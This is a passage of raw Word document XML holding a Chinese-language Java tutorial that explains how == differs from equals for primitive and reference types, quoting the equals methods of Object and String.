        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> short</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> float</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> double</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），只能使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为这些基本类型的变量没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。对于基本类型变量的比较，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般比较的是它们的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D27A806" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7565E730" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>引用类型的变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来说（例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类）才有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继承了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Object </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Object </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类的通用方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。对于该类型对象的比较，默认情况下，也就是没有复写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Object </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较是一样效果的，都是比较的是它们在内存中的存放地址。但是对于某些类来说，为了满足自身业务需求，可能存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法被复写的情况，这时使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法比较需要看具体的情况，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法会比较它们的值；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616303C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E943C43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于上述第三点理解起来可能有点复杂，因为这里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法比较需要分两种情况来讨论，一种情况是该方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>没有被重写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，另外一种是该方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>被重写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8A9D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF75161" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法没有被重写的情况。如果类没有重写该方法，那么默认使用的就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Object </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的方法，以下是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Object </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F9AE49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9FFB44" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  public boolean equals(Object obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707723E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      return (this == obj);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A8A08C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5123CFAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E34896" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从源码可以看出，里面使用的就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较，所以这种情况下比较的就是它们在内存中的存放地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B647E6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="395316EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法被重写的情况。以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类为例，以下是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A3818D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72ADD6EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  @Override </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121B916D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  public boolean equals(Object other) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A6CD27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (other == this) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081920BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4709EF1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6327206C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (other instanceof String) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F13B6DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      String s = (String)other;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625AF7C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      int count = this.count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E06FD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (s.count != count) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2EC605" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6F9BE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BC26DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      if (hashCode() != s.hashCode()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2BA620" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E912286" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E61CC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      char[] value1 = value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EA3384" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      int offset1 = offset;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C71E4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      char[] value2 = s.value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE25785" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      int offset2 = s.offset;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C448A90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      for (int end = offset1 + count; offset1 &lt; end; ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C84C340" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          if (value1[offset1] != value2[offset2]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4361B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">              return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00087FE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611E7868" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          offset1++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FE2B49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          offset2++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CF8082" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2881F822" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D190267" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637DD8EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF7B5B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53032178" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A27D954" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C9321A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>从源码可以看出，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类复写了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，当使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较内存的存放地址不相等时，接下来会比较字符串的内容是否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相等，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法会比较两者的字符串内容是否一样。我们来看看下面的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3293C6F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
